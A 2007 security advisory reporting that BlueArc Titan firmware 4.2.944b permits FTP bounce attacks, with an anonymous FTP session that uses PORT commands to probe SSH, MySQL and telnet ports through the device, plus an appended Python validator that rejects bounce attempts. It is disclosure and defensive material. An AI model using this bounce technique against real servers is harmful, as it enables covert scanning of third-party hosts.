BlueArc Firmware 4.2.944b FTP bounce

2007-04-20T00:00:00
ID SECURITYVULNS:DOC:16791
Type securityvulns
Reporter Securityvulns
Modified 2007-04-20T00:00:00

Description

Hi all,

BlueArc Titan 2x00 devices running firmware version 4.2.944b are susceptible to FTP bounce attacks. The vendor has confirmed this, and a fix is available in the 4.3 firmware.

Example: first a PORT to the SSH port, which succeeds; then to the MySQL port, no success; then to the telnet port, no success.

[user@localhost ~]$ ftp bluearctitan
Connected to bluearctitan.
220 Server ready (BlueArc-FTPD v1.0)
Name (bluearctitan:user): anonymous
331 Username okay; need password
Password:
230 User logged in, proceed
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "PORT xxx,xxx,xxx,xxx,0,22"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
226 Transfer Complete
ftp> quote "PORT xxx,xxx,xxx,xxx,12,234"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
425 Can't open data connection (dtp_list)
ftp> quote "PORT xxx,xxx,xxx,xxx,0,23"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
425 Can't open data connection (dtp_list)
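The server-side check that closes this class of bug, as an added example that is not from the advisory or from BlueArc's firmware: a PORT validator in the style of RFC 2577 that only accepts data connections back to the control-connection peer on an unprivileged port, run over constructed commands modelled on the session above (the 10.0.0.5 peer address and the third-party 192.168.1.20 target are assumed sample values).

```python
import ipaddress
import re

# Constructed sample: control-channel commands as an FTP server would log them.
# The control connection is assumed to come from 10.0.0.5, yet two PORT
# commands name a different host, exactly the bounce pattern in the advisory.
SAMPLE_PEER = "10.0.0.5"
SAMPLE_COMMANDS = [
    "PORT 10,0,0,5,200,17",      # legitimate: same host, port 51217
    "PORT 192,168,1,20,0,22",    # third-party host, port 22 (SSH)
    "PORT 192,168,1,20,12,234",  # third-party host, port 3306 (MySQL)
    "PORT 10,0,0,5,0,23",        # same host but privileged port 23
]

PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$", re.IGNORECASE)

def parse_port(cmd):
    """Return (ip, port) for 'PORT h1,h2,h3,h4,p1,p2', or None if malformed."""
    m = PORT_RE.match(cmd)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.group(1).split(","))
    if max(h1, h2, h3, h4, p1, p2) > 255:
        return None
    return f"{h1}.{h2}.{h3}.{h4}", (p1 << 8) | p2

def check_port(peer_ip, cmd):
    """RFC 2577 style policy: the data connection may only go back to the
    control-connection peer, and never to a privileged port.
    Returns (accepted, reason)."""
    parsed = parse_port(cmd)
    if parsed is None:
        return False, "malformed PORT"
    ip, port = parsed
    if ipaddress.ip_address(ip) != ipaddress.ip_address(peer_ip):
        return False, f"bounce attempt: PORT to third-party host {ip}:{port}"
    if port < 1024:
        return False, f"privileged data port {port}"
    return True, f"ok {ip}:{port}"

def audit(peer_ip, commands):
    """Apply check_port to every command; useful both inline and over logs."""
    return [check_port(peer_ip, c) for c in commands]

if __name__ == "__main__":
    for cmd, (ok, why) in zip(SAMPLE_COMMANDS, audit(SAMPLE_PEER, SAMPLE_COMMANDS)):
        print(f"{'ACCEPT' if ok else 'REJECT'} {cmd:28s} {why}")
```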